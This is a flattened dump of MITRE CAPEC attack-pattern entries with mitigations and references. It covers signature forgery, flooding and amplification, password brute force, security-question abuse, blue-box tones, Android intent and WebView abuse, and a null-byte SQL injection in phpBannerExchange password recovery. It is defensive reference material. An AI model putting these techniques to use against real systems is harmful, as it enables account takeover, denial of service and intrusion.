javascript hacks The Spanner January 29, 2009 http://www.thespanner.co.uk/2009/01/29/detecting-browsers-javascript-hacks/ Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 Evgeny Lebanidze Cigital Federal, Inc 2011-05-31 MITRE Content Team MITRE 2013-06-21 Updated Code_Example_Language and Summary CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker generates a message or datablock that causes the recipient to believe that the message or datablock was generated and cryptographically signed by an authoritative or reputable source, misleading a victim or victim operating system into performing malicious actions. The victim or victim system is dependent upon a cryptographic signature-based verification system for validation of one or more security events or actions. The validation can be bypassed via an attacker-provided signature that makes it appear that the legitimate authoritative or reputable source provided the signature. Protocol Manipulation Analysis API Abuse Brute Force Spoofing An attacker provides a victim with a malicious executable disguised as a legitimate executable from an established software by signing the executable with a forged cryptographic key. The victim's operating system attempts to verify the executable by checking the signature, the signature is considered valid, and the attackers' malicious executable runs. An attacker exploits weaknesses in a cryptographic algorithm to that allow a private key for a legitimate software vendor to be reconstructed, attacker-created malicious software is cryptographically signed with the reconstructed key, and is installed by the victim operating system disguised as a legitimate software update from the software vendor. High Technical understanding of how signature verification algorithms work with data and applications Access_Control Authentication Gain privileges / assume identity 20 Targeted 327 Targeted 290 Targeted 1000 Category ChildOf 156 Patrick Henry Ponte Technologies LLC 2013-03-18 CAPEC Content Team MITRE 2014-02-06 An attacker obtains an authoritative or reputable signer's private signature key by theft and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker. An authoritative or reputable signer is storing their private signature key with insufficient protection. High Medium Analysis Spoofing Low Knowledge of common location methods and access methods to sensitive data High Ability to compromise systems containing sensitive data Restrict access to private keys from non-supervisory accounts Restrict access to administrative personnel and processes only Ensure all remote methods are secured Ensure all services are patched and up to date 284 Targeted 693 Targeted 216 Targeted 1000 Attack Pattern ChildOf 473 Sigbjørn Vik Security breach stopped http://my.opera.com/securitygroup/blog/2013/06/26/opera-infrastructure-attack 2013-06-26 Patrick Morley Bit9 and Our Customers’ Security https://blog.bit9.com/2013/02/08/bit9-and-our-customers-security/ 2013-02-08 Brad Arkin Inappropriate Use of Adobe Code Signing Certificate http://blogs.adobe.com/asset/2012/09/inappropriate-use-of-adobe-code-signing-certificate.html 2012-09-27 Patrick Henry Ponte Technologies LLC 2013-03-18 CAPEC Content Team MITRE 2014-02-06 An attacker exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key. Recipient is using a weak cryptographic signature verification algorithm or a weak implementation of a cryptographic signature verification algorithm, or the configuration of the recipient's application accepts the use of keys generated using cryptographically weak signature verification algorithms. High Low Protocol Manipulation Analysis API Abuse Brute Force Spoofing High Cryptanalysis of signature verification algorithm High Reverse engineering and cryptanalysis of signature verification algorithm implementation Use programs and products that contain cryptographic elements that have been thoroughly tested for flaws in the signature verification routines. 693 Targeted CVE-2006-4339 Targeted 1000 Attack Pattern ChildOf 473 1000 Attack Pattern ParentOf 459 Patrick Henry Ponte Technologies LLC 2013-03-18 CAPEC Content Team MITRE 2014-02-06 An attacker exploits a weakness in the parsing or display code of the recipient software to generate a data blob containing a supposedly valid signature, but the signer's identity is falsely represented, which can lead to the attacker manipulating the recipient software or its victim user to perform compromising actions. Recipient is using signature verification software that does not clearly indicate potential homographs in the signer identity. Recipient is using signature verification software that contains a parsing vulnerability, or allows control characters in the signer identity field, such that a signature is mistakenly displayed as valid and from a known or authoritative signer. High Low Protocol Manipulation Spoofing High Attacker needs to understand the layout and composition of data blobs used by the target application. High To discover a specific vulnerability, attacker needs to reverse engineer signature parsing, signature verification and signer representation code. High Attacker may be required to create malformed data blobs and know how to insert them in a location that the recipient will visit. Ensure the application is using parsing and data display techniques that will accurately display control characters, international symbols and markings, and ultimately recognize potential homograph attacks. 1000 Attack Pattern ChildOf 473 Eric Johanson The state of homograph attacks http://www.shmoo.com/idn/homograph.txt 2005-02-11 Patrick Henry Ponte Technologies LLC 2013-03-18 CAPEC Content Team MITRE 2014-02-06 An attacker exploits the underlying complexity of a data structure that allows for both signed and unsigned content, to cause unsigned data to be processed as though it were signed data. Signer and recipient are using complex data storage structures that allow for a mix between signed and unsigned data Recipient is using signature verification software that does not maintain separation between signed and unsigned data once the signature has been verified. High Low Protocol Manipulation Analysis API Abuse Spoofing High The attacker may need to continuously monitor a stream of signed data, waiting for an exploitable message to appear. High Attacker must be able to create malformed data blobs and know how to insert them in a location that the recipient will visit. Ensure the application is fully patched and does not allow the processing of unsigned data as if it is signed data. 693 Targeted 311 Targeted 319 Targeted CVE-2007-1263 Targeted CVE-2010-3618 Targeted CVE-2012-6359 Targeted 1000 Attack Pattern ChildOf 473 Patrick Henry Ponte Technologies LLC 2013-03-18 CAPEC Content Team MITRE 2014-02-06 This attack relies on client side code to access local files and resources instead of URLs. When the client browser is expecting a URL string, but instead receives a request for a local file, that execution is likely to occur in the browser process space with the browser's authority to local files. The attacker can send the results of this request to the local files out to a site that they control. This attack may be used to steal sensitive authentication data (either local or remote), or to gain system profile information to launch further attacks. The victim's software must not differentiate between the location and type of reference passed the client software, e.g. browser High High API Abuse Modification of Resources Protocol Manipulation J2EE applications frequently use .properties files to store configuration information including JDBC connections, LDAP connection strings, proxy information, system passwords and other system metadata that is valuable to attackers looking to probe the system or bypass policy enforcement points. When these files are stored in publicly accessible directories and are allowed to be read by the public user, then an attacker can list the directory identify a .properties file and simply load its contents in the browser listing its contents. A standard Hibernate properties file contains hibernate.connection.driver_class = org.postgresql.Driver hibernate.connection.url = jdbc:postgresql://localhost/mydatabase hibernate.connection.username = username hibernate.connection.password = password hibernate.c3p0.min_size=5 hibernate.c3p0.max_size=20 Even if the attacker cannot write this file, there is plenty of information to leverage to gain further access. Medium Attacker identifies known local files to exploit Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification. Implementation: Ensure all configuration files and resource are either removed or protected when promoting code into production. Design: Use browser technologies that do not allow client side scripting. Implementation: Perform input validation for all remote content. Implementation: Perform output validation for all remote content. Implementation: Disable scripting languages such as JavaScript in browser Confidentiality Read application data Integrity Modify application data 241 Targeted 706 Targeted 1000 Category ChildOf 210 Exploitation High High Low All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.48.1][REF-2] Cigital, Inc 2007-01-01 [R.48.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Solutions_and_Mitigations An adversary may execute a flooding attack using the TCP protocol with the intent to deny legitimate users access to a service. These attacks exploit the weakness within the TCP protocol where there is some state information for the connection the server needs to maintain. This type of an attack requires the ability to generate a large amount of TCP traffic to send to the target port of a functioning server. To mitigate this type of an attack, an organization can monitor incoming packets and look for patterns in the TCP traffic to determine if the network is under an attack. The potential target may implement a rate limit on TCP SYN messages which would provide limited capabilities while under attack. 1000 Attack Pattern ChildOf 125 CAPEC Content Team MITRE 2014-02-06 Client applications such as web browsers that process HTML data often need to transform data in and out of the XML format by using an XML parser. It may be possible for an attacker to inject data that may have an adverse effect on the XML parser when it is being processed. These adverse effects may include the parser crashing, consuming too much of a resource, executing too slowly, executing code supplied by an attacker, allowing usage of unintended system functionality, etc. An attacker's goal is to leverage parser failure to his or her advantage. In some cases it may be possible to jump from the data plane to the control plane via bad data being passed to an XML parser. [R.484.1] An attacker determines the input data stream that is being processed by an XML parser on the victim's side. An attacker crafts input data that may have an adverse effect on the operation of the XML parser when the data is parsed on the victim's system. An application uses an XML parser to perform transformation on user-controllable data. An application does not perform sufficient validation to ensure that user-controllable data is safe for an XML parser. Medium Injection API Abuse "A remote code execution vulnerability exists in the way that Microsoft Windows parses XML content. The vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user. In a web-based attack scenario, an attacker would have to host a website that contains a specially crafted webpage that is used to exploit this vulnerability. An attacker would have no way to force users to visit such a website. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes the user to the attackers' website." [R.484.2] CVE-2013-0006 CVE-2013-0007 High Arbitrary code execution The client software crashes after visiting a URL downloaded from a hostile server. Carefully validate and sanitize all user-controllable data prior to passing it to the XML parser routine. Ensure that the resultant data is safe to pass to the XML parser. The client software should have the latest patches and should be audited for vulnerabilities before being used to communicate with potentially hostile servers. Availability DoS: resource consumption (memory) Confidentiality Read memory Confidentiality Integrity Availability Execute unauthorized code or commands Confidentiality Access_Control Authorization Gain privileges / assume identity Client software that parses XML data included in HTML data. User-controllable XML code The XML parser code. 112 Targeted 20 Targeted 19 Targeted 1000 Attack Pattern ChildOf 82 Penetration Exploitation Medium High High Client-Server All All All Shlomo, Yona XML Parser Attacks: A summary of ways to attack an XML Parser What is an XML Parser Attack? 2007 http://yeda.cs.technion.ac.il/~yona/talks/xml_parser_attacks/slides/slide2.html Microsoft Security Bulletin MS13-002 Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution Version 1.1 Microsoft Security Response Center Archive Microsoft January 8, 2013 http://technet.microsoft.com/en-us/security/bulletin/ms13-002 CAPEC Content Team MITRE 2013-12-18 CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Description Summary, Examples-Instances An attacker obtains an authoritative or reputable signer's private signature key by exploiting a cryptographic weakness in the signature algorithm or pseudorandom number generation and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker. An authoritative signer is using a weak method of random number generation or weak signing software that causes key leakage or permits key inference. An authoritative signer is using a signature algorithm with a direct weakness or with poorly chosen parameters that enable the key to be recovered using signatures from that signer. High Low Protocol Manipulation Analysis API Abuse Brute Force Spoofing High Cryptanalysis of signature generation algorithm High Reverse engineering and cryptanalysis of signature generation algorithm implementation and random number generation High Ability to create malformed data blobs and know how to present them directly or indirectly to a victim. Ensure cryptographic elements have been sufficiently tested for weaknesses. 330 Secondary 310 Secondary CVE-2008-0166 Targeted CVE-2007-3108 Targeted 1000 Attack Pattern ChildOf 473 P.J. Leadbitter D. Page N.P. Smart Attacking DSA Under a Repeated Bits Assumption http://www.iacr.org/archive/ches2004/31560428/31560428.pdf 2004-07 Debian Security DSA-1571-1 openssl -- predictable random number generator http://www.debian.org/security/2008/dsa-1571 2008-05-13 Patrick Henry Ponte Technologies LLC 2013-03-18 CAPEC Content Team MITRE 2014-02-06 An adversary may execute a flooding attack using the UDP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. Additionally, firewalls often open a port for each UDP connection destined for a service with an open UDP port, meaning the firewalls in essence save the connection state thus the high packet nature of a UDP flood can also overwhelm resources allocated to the firewall. UDP attacks can also target services like DNS or VoIP which utilize these protocols. Additionally, due to the session-less nature of the UDP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack. This type of an attack requires the ability to generate a large amount of UDP traffic to send to the desired port of a target service using UDP. To mitigate this type of an attack, modern firewalls drop UDP traffic destined for closed ports, and unsolicited UDP reply packets. A variety of other countermeasures such as universal reverse path forwarding and remote triggered black holing(RFC3704) along with modifications to BGP like black hole routing and sinkhole routing(RFC3882) help mitigate the spoofed source IP nature of these attacks. 1000 Attack Pattern ChildOf 125 CAPEC Content Team MITRE 2014-02-06 An adversary may execute a flooding attack using the ICMP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. A typical attack involves a victim server receiving ICMP packets at a high rate from a wide range of source addresses. Additionally, due to the session-less nature of the ICMP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack. This type of an attack requires the ability to generate a large amount of ICMP traffic to send to the target server. To mitigate this type of an attack, an organization can enable ingress filtering. Additionally modifications to BGP like black hole routing and sinkhole routing(RFC3882) help mitigate the spoofed source IP nature of these attacks. 1000 Attack Pattern ChildOf 125 CAPEC Content Team MITRE 2014-02-06 An adversary may execute a flooding attack using the HTTP protocol with the intent to deny legitimate users access to a service by consuming resources at the application layer such as web services and their infrastructure. These attacks use legitimate session-based HTTP GET requests designed to consume large amounts of a server's resources. Since these are legitimate sessions this attack is very difficult to detect. This type of an attack requires the ability to generate a large amount of HTTP traffic to send to a target server. To mitigate this type of an attack, an organization can monitor the typical traffic flow. When spikes in usage occur, filters could examine traffic for indicators of bad behavior with respect to the web servers, and then create firewall rules to deny the malicious IP addresses. These patterns in the filter could be a combination of trained behavior, knowledge of standards as they apply to the web server, known patterns, or anomaly detection. Firewalling source IPs works since the HTTP is sent using TCP so the source IP can't be spoofed; if the source IP is spoofed is, then it's not legitimate traffic. Special care should be taken care with rule sets to ensure low false positive rates along with a method at the application layer to allow a valid user to begin using the service again. Another possible solution is using 3rd party providers as they have experts, knowledge, experience, and resources to deal with the attack and mitigate it before hand or while it occurs. The best mitigation is preparation before an attack, but there is no bulletproof solution as with ample resources a brute force attack may succeed. 1000 Attack Pattern ChildOf 125 All CAPEC Content Team MITRE 2014-02-06 An adversary may execute a flooding attack using the SSL protocol with the intent to deny legitimate users access to a service by consuming all the available resources on the server side. These attacks take advantage of the asymmetric relationship between the processing power used by the client and the processing power used by the server to create a secure connection. In this manner the attacker can make a large number of HTTPS requests on a low provisioned machine to tie up a disproportionately large number of resources on the server. The clients then continue to keep renegotiating the SSL connection. When multiplied by a large number of attacking machines, this attack can result in a crash or loss of service to legitimate users. This type of an attack requires the ability to generate a large amount of SSL traffic to send a target server. To mitigate this type of an attack, an organization can create rule based filters to silently drop connections if too many are attempted in a certain time period. 1000 Attack Pattern ChildOf 125 CAPEC Content Team MITRE 2014-02-06 In this attack, the attacker tries every possible value for a password until they succeed. A brute force attack, if feasible computationally, will always be successful because it will essentially go through all possible passwords given the alphabet used (lower case letters, upper case letters, numbers, symbols, etc.) and the maximum length of the password. A system will be particularly vulnerable to this type of an attack if it does not have a proper enforcement mechanism in place to ensure that passwords selected by users are strong passwords that comply with an adequate password policy. In practice a pure brute force attack on passwords is rarely used, unless the password is suspected to be weak. Other password cracking methods exist that are far more effective (e.g. dictionary attacks, rainbow tables, etc.). Determine application's/system's password policy Determine the password policies of the target application/system. Determine minimum and maximum allowed password lengths. env-All Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc.). env-All Determine account lockout policy (a strict account lockout policy will prevent brute force attacks). env-All Passwords are used in the application/system env-All Passwords are not used for authentication; however, brute forcing of other protection mechanisms may also be possible. env-All Brute force password Given the finite space of possible passwords dictated by the password policy determined in the previous step, try all possible passwords for a known user ID until application/system grants access. Manually or automatically enter all possible passwords through the application/system's interface. In most systems, start with the shortest and simplest possible passwords, because most users tend to select such passwords if allowed to do so. env-All Perform an offline dictionary attack or a rainbow table attack against a known password hash. env-All Weak passwords allowed, and no account lockout policy enforced. env-All Password hashes can be captured by attacker. env-All Accounts locked out after small number of failed authentication attempts. env-All Attacker determines correct password for a user ID and obtains access to application or system. Attacker is unable to determine correct password for a user ID and obtain access to application or system. Attacker locks out account while attempting to brute force its password. Large number of authentication failures in logs. Enforce strict account lockout policies. Enforce strong passwords (having sufficient length and containing mix of lower case and upper case letters, numbers, and special characters) Deny login attempts from sources that produce too many failed attempts. Note that this may cause problems where many users may have the same "source" as far as the application/system is concerned (e.g. a lot of users behind a NAT device). An attacker needs to know a username to target. The system uses password based authentication as the one factor authentication mechanism. An application does not have a password throttling mechanism in place. A good password throttling mechanism will make it almost impossible computationally to brute force a password as it may either lock out the user after a certain number of incorrect attempts or introduce time out periods. Both of these would make a brute force attack impractical. High Medium Brute Force A system does not enforce a strong password policy and the user picks a five letter password consisting of lower case English letters only. The system does not implement any password throttling mechanism. Assuming the attacker does not know the length of the users' password, an attacker can brute force this password in maximum 1+26+26^2+26^3+26^4+26^5 = 1 + 26 + 676 + 17576 + 456976 + 11,881,376 = 12,356,631 attempts, and half these tries (6,178,316) on average. Using modern hardware this attack is trivial. If the attacker were to assume that the user password could also contain upper case letters (and it was case sensitive) and/or numbers, than the number of trials would have been larger. An attacker's job would have most likely been even easier because many users who choose easy to brute force passwords like this are also likely to use a word that can be found in the dictionary. Since there are far fewer valid English words containing up to five letters than 12,356,631, an attack that tries each of the entries in the English dictionary would go even faster. A weakness exists in the automatic password generation routine of Mailman prior to 2.1.5 that causes only about five million different passwords to be generated. This makes it easy to brute force the password for all users who decided to let Mailman automatically generate their passwords for them. Users who chose their own passwords during the sign up process would not have been affected (assuming that they chose strong passwords). CVE-2004-1143 Low A brute force attack is very straightforward. A variety of password cracking tools are widely available. A powerful enough computer for the job with sufficient CPU, RAM and HD. Exact requirements will depend on the size of the brute force job and the time requirement for completion. Some brute forcing jobs may require grid or distributed computing (e.g. DES Challenge). Many incorrect login attempts are detected by the system. Try to spoof IP addresses so that it does not look like the incorrect log in attempts are coming from the same computer. Implement a password throttling mechanism. This mechanism should take into account both the IP address and the log in name of the user. Put together a strong password policy and make sure that all user created passwords comply with it. Alternatively automatically generate strong passwords for users. Passwords need to be recycled to prevent aging, that is every once in a while a new password must be chosen. Confidentiality Access_Control Authorization Gain privileges / assume identity 521 Targeted 262 Targeted 263 Targeted 257 Targeted 693 Targeted 1000 Attack Pattern ChildOf 112 Penetration High High Low All All All All Eugene Lebanidze Cigital, Inc 2007-02-26 Eugene Lebanidze Cigital, Inc 2007-02-26 Sean Barnum Cigital, Inc 2007-03-01 Review and revision of content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Amit Sethi Cigital, Inc. 2007-10-29 Added extended Attack Execution Flow Sean Barnum Cigital, Inc 2007-03-01 Review and revision of content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Amit Sethi Cigital, Inc. 2007-10-29 Added extended Attack Execution Flow CAPEC Content Team MITRE 2014-02-06 Updated Examples-Instances An adversary may execute a flooding attack using amplification and reflection methods. The goal of these attacks is to use relatively few resources to create a large amount of traffic against a target server. In a reflection attack the attacker sends traffic with a spoofed source address equal to the target to a large number of third party servers. The 3rd party servers in turn send their responses to the spoofed IP address which happens to be actual target. The target is inundated with traffic from the third party servers. The responses sent by the third party servers may also be much larger or require more resources to process at the target than the messages originally generated by the attacker and sent to the third party server. This discrepancy in size between the attack and the final payload delivered to the target is the amplification part of this attack. This type of an attack requires the ability to generate a large amount of traffic with a spoofed source IP to a list of third party servers that respond to the desired protocol request. To mitigate a reflection type of an attack, an organization can attempt to identify the 3rd party servers and firewall them until the traffic ends. Once the attack is over or a timeout happens the third party servers should be allowed through the firewall as they could be legitimate users that were victims. An amplification attack can be mitigated by filtering traffic for suspicious message patterns such as a spike in traffic where each request is for the same large file to be served. Care should be taken to prevent false positive rates so legitimate users' traffic isn't firewalled. 1000 Attack Pattern ChildOf 125 CAPEC Content Team MITRE 2014-02-06 An adversary examines screenshot images created by iOS in an attempt to obtain sensitive information. These images are used by iOS to aid in the visual transition between open applications and improve the user's experience with a device. An application can be at risk even if it properly protects sensitive information when at rest. If the application displays sensitive information on the screen, then the potential exists for iOS to unintentionally record that information in an image file. An adversary can retrieve these images either by gaining access to the image files, or by physically obtaining the device and leveraging the multitasking switcher interface. This type of an attack requires physical access to a device to either excavate the image files (potentially by leveraging a Jailbreak) or view the screenshots through the multitasking switcher (by double tapping the home button on the device). To mitigate this type of an attack, an application that may display sensitive information should clear the screen contents before a screenshot is taken. This can be accomplished by setting the key window's hidden property to YES. This code to hide the contents should be placed in both the applicationWillResignActive() and applicationDidEnterBackground() methods. 1000 Attack Pattern ChildOf 116 Jonathan Zdziarksi Hacking and Securing iOS Applications Chapter 11 : Page 285 : Application Screenshots First Edition O'Reilly Media, Inc. 2012 CAPEC Content Team MITRE 2014-02-06 An adversary, through a previously installed malicious application, intercepts messages from a trusted Android-based application in an attempt to achieve a variety of different objectives including denial of service, information disclosure, and data injection. An implicit intent sent from a trusted application can be received by any application that has declared an appropriate intent filter. If the intent is not protected by a permission that the malicious application lacks, then the attacker can gain access to the data contained within the intent. Further, the intent can be either blocked from reaching the intended destination, or modified and potentially forwarded along. An adversary must be able install a purpose built malicious application onto the Android device and convince the user to execute it. The malicious application is used to intercept implicit intents. To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An explicit intent is delivered to a specific application as declared within the intent, whereas the Android operating system determines who receives an implicit intent which could potentially be a malicious application. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly. Implicit intents should never be used for inter-application communication. 1000 Attack Pattern ChildOf 117 Erika Chin Adrienne Porter Felt Kate Greenwood David Wagner Analyzing Inter-Application Communication in Android 3.1 Unauthorized Intent Receipt International Conference on Mobile Systems, Applications, and Services (MobiSys) 2011 http://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf CAPEC Content Team MITRE 2014-02-06 This attack against older telephone switches and trunks has been around for decades. The signal is sent by the attacker to impersonate a supervisor signal. This has the effect of rerouting or usurping command of the line and call. While the US infrastructure proper may not contain widespread vulnerabilities to this type of attack, many companies are connected globally through call centers and business process outsourcing. These international systems may be operated in countries which have not upgraded Telco infrastructure and so are vulnerable to Blue boxing. Blue boxing is a result of failure on the part of the system to enforce strong authentication for administrative functions. While the infrastructure is different than standard current applications like web applications, there are historical lessons to be learned to upgrade the access control for administrative functions. System must use weak authentication mechanisms for administrative functions. Very High Medium Injection Protocol Manipulation Attacker identifies a vulnerable CCITT-5 phone line, and sends a combination tone to the switch in order to request administrative access. Based on tone and timing parameters the request is verified for access to the switch. Once the attacker has gained control of the switch launching calls, routing calls, and a whole host of opportunities are available. Low Given a vulnerable phone system, the attackers' technical vector relies on attacks that are well documented in cracker 'zines and have been around for decades. CCITT-5 or other vulnerable lines, with the ability to send tones such as combined 2,400 Hz and 2,600 Hz tones to the switch Implementation: Upgrade phone lines. Note this may be prohibitively expensive Use strong access control such as two factor access control for administrative access to the switch Availability DoS: resource consumption (other) Denial of Service Confidentiality Access_Control Authorization Gain privileges / assume identity Payload delivered through standard communication protocols. Command(s) executed directly on host Client machine and client network Enables calls to be rerouted. 264 Targeted 1000 Category ChildOf 152 Penetration Low Medium Medium Other Other Other All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.5.1][REF-2] Cigital, Inc 2007-01-01 [R.5.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attacker_Skills_or_Knowledge_Required, Description Summary, Solutions_and_Mitigations An attacker may take advantage of the application feature to help users recover their forgotten passwords in order to gain access into the system with the same privileges as the original user. Generally password recovery schemes tend to be weak and insecure. Most of them use only one security question . For instance, mother's maiden name tends to be a fairly popular one. Unfortunately in many cases this information is not very hard to find, especially if the attacker knows the legitimate user. These generic security questions are also re-used across many applications, thus making them even more insecure. An attacker could for instance overhear a coworker talking to a bank representative at the work place and supplying their mother's maiden name for verification purposes. An attacker can then try to log in into one of the victim's accounts, click on "forgot password" and there is a good chance that the security question there will be to provide mother's maiden name. A weak password recovery scheme totally undermines the effectiveness of a strong password scheme. Understand the password recovery mechanism and how it works. Find a weakness in the password recovery mechanism and exploit it. For instance, a weakness may be that a standard single security question is used with an easy to determine answer. The system allows users to recover their passwords and gain access back into the system. Password recovery mechanism has been designed or implemented insecurely. Password recovery mechanism relies only on something the user knows and not something the user has. No third party intervention is required to use the password recovery mechanism. High Medium Brute Force API Abuse Injection An attacker clicks on the "forgot password" and is presented with a single security question. The question is regarding the name of the first dog of the user. The system does not limit the number of attempts to provide the dog's name. An attacker goes through a list of 100 most popular dog names and finds the right name, thus getting the ability to reset the password and access the system. phpBanner Exchange is a PHP script (using the mySQL database) that facilitates the running of a banner exchange without extensive knowledge of PHP or mySQL. A SQL injection was discovered in the password recovery module of the system that allows recovering an arbitrary user's password and taking over his account. The problem is due to faulty input sanitization in the phpBannerExchange, specifically the e-mail address of the user which is requested by the password recovery module. The e-mail address requested by the password recovery module on the resetpw.php page. That e-mail address is validated with the following regular expression: if(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)* (\.[a-z]{2,3})$", $email)){ A bug in the implementation of eregi() allows to pass additional character using a null byte "\0". Since eregi() is implemented in C, the variable $email is treated as a zero-terminated string. All characters following the Null Byte will not be recognized by the gular expression. So an e-mail address can be provided that includes the special character " ' " to break the SQL query below (and it will not be rejected by the regular expression because of the null byte trick). So a SQL injection becomes possible: $get_info=mysql_query("select * from banneruser where email='$email' "); This query will return a non-zero result set even though the email supplied (attacker's email) is not in the database. Then a new password for the user is generated and sent to the $email address, an e-mail address controlled by the attacker. An attacker can then log in into the system. CVE-2006-3013 Low Brute force attack Medium Social engineering and more sophisticated technical attacks. For a brute force attack one would need a machine with sufficient CPU, RAM and HD. Trial and error (brute force). Social Engineering. Many incorrect attempts to answer the security question. Use multiple security questions (e.g. have three and make the user answer two of them correctly). Let the user select their own security questions or provide them with choices of questions that are not generic. E-mail the temporary password to the registered e-mail address of the user rather than letting the user reset the password online. Ensure that your password recovery functionality is not vulnerable to an injection style attack. Confidentiality Access_Control Authorization Gain privileges / assume identity 522 Targeted 640 Targeted 718 Targeted 1000 Category ChildOf 212 Penetration High High Low All All All All Advisory: Unauthorized password recovery in phpBannerExchange RedTeam Pentesting GmbH 2006 http://www.redteam-pentesting.de/advisories/rt-sa-2006-005.txt Eugene Lebanidze Cigital, Inc 2007-02-26 Eugene Lebanidze Cigital, Inc 2007-02-26 Sean Barnum Cigital, Inc 2007-03-01 Review and revision of content Sean Barnum Cigital, Inc 2007-03-01 Review and revision of content CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Description Summary An adversary, through a previously installed malicious application, injects code into the context of a web page displayed by a WebView component. Through the injected code, an adversary is able to manipulate the DOM tree and cookies of the page, expose sensitive information, and can launch attacks against the web application from within the web page. An adversary must be able install a purpose built malicious application onto the device and convince the user to execute it. The malicious application is designed to target a specific web application and is used to load the target web pages via the WebView component. For example, an adversary may develop an application that interacts with Facebook via WebView and adds a new feature that a user desires. The user would install this 3rd party app instead of the Facebook app. The only known mitigation to this type of attack is to keep the malicious application off the system. There is nothing that can be done to the target application to protect itself from a malicious application that has been installed and executed. 1000 Category ChildOf 253 Tongbo Luo Hao Hao Wenliang Du Yifei Wang Heng Yin Attacks on WebView in the Android System Annual Computer Security Applications Conference (ACSAC) 2011 http://www.cis.syr.edu/~wedu/Research/paper/webview_acsac2011.pdf CAPEC Content Team MITRE 2014-02-06 An adversary, through a previously installed malicious application, intercepts an implicit intent sent to launch a trusted activity and instead launches a counterfeit activity in its place. The malicious activity is then used to mimic the trusted activity's user interface and convince the user to enter sensitive data as if they were interacting with the trusted activity. To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An explicit intent is delivered to a specific application as declared within the intent, whereas the Android operating system determines who receives an implicit intent which could potentially be a malicious application. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly. Implicit intents should never be used for inter-application communication. 1000 Attack Pattern ChildOf 499 1000 Attack Pattern ChildOf 173 Erika Chin Adrienne Porter Felt Kate Greenwood David Wagner Analyzing Inter-Application Communication in Android 3.1.2 Activity Hijacking International Conference on Mobile Systems, Applications, and Services (MobiSys) 2011 http://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf CAPEC Content Team MITRE 2014-02-06 An adversary, through a previously installed malicious application, issues an intent directed toward a specific trusted application's component in an attempt to achieve a variety of different objectives including modification of data, information disclosure, and data injection. Components that have been unintentionally exported and made public are subject to this type of an attack. If the component blindly trusts the intent's action, then the target application performs the functionality at the adversary's request, helping the adversary achieve the desired negative technical impact. An adversary must be able install a purpose built malicious application onto the Android device and convince the user to execute it. The malicious application will be used to issue spoofed intents. To limit one's exposure to this type of attack, developers should avoid exporting components unless the component is specifically designed to handle requests from untrusted applications. Developers should be aware that declaring an intent filter will automatically export the component, exposing it to public access. Critical, state-changing actions should not be placed in exported components. If a single component handles both inter- and intra-application requests, the developer should consider dividing that component into separate components. If a component must be exported (e.g., to receive system broadcasts), then the component should dynamically check the caller's identity prior to performing any operations. Requiring Signature or SignatureOrSystem permissions is an effective way of limiting a component's exposure to a set of trusted applications. Finally, the return values of exported components can also leak private data, so developers should check the caller's identity prior to returning sensitive values. 1000 Category ChildOf 156 Erika Chin Adrienne Porter Felt Kate Greenwood David Wagner Analyzing Inter-Application Communication in Android International Conference on Mobile Systems, Applications, and Services (MobiSys) 2011 http://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf CAPEC Content Team MITRE 2014-02-06 An adversary, through a malicious web page, accesses application specific functionality by leveraging interfaces registered through WebView's addJavascriptInterface API. Once an interface is registered to WebView through addJavascriptInterface, it becomes global and all pages loaded in the WebView can call this interface. This type of an attack requires the adversary to convince the user to load the malicious web page inside the target application. Once loaded, the malicious web page will have the same permissions as the target application and will have access to all registered interfaces. Both the permission and the interface must be in place for the functionality to be exposed. To mitigate this type of an attack, an application should limit permissions to only those required and should verify the origin of all web content it loads. 1000 Attack Pattern ChildOf 122 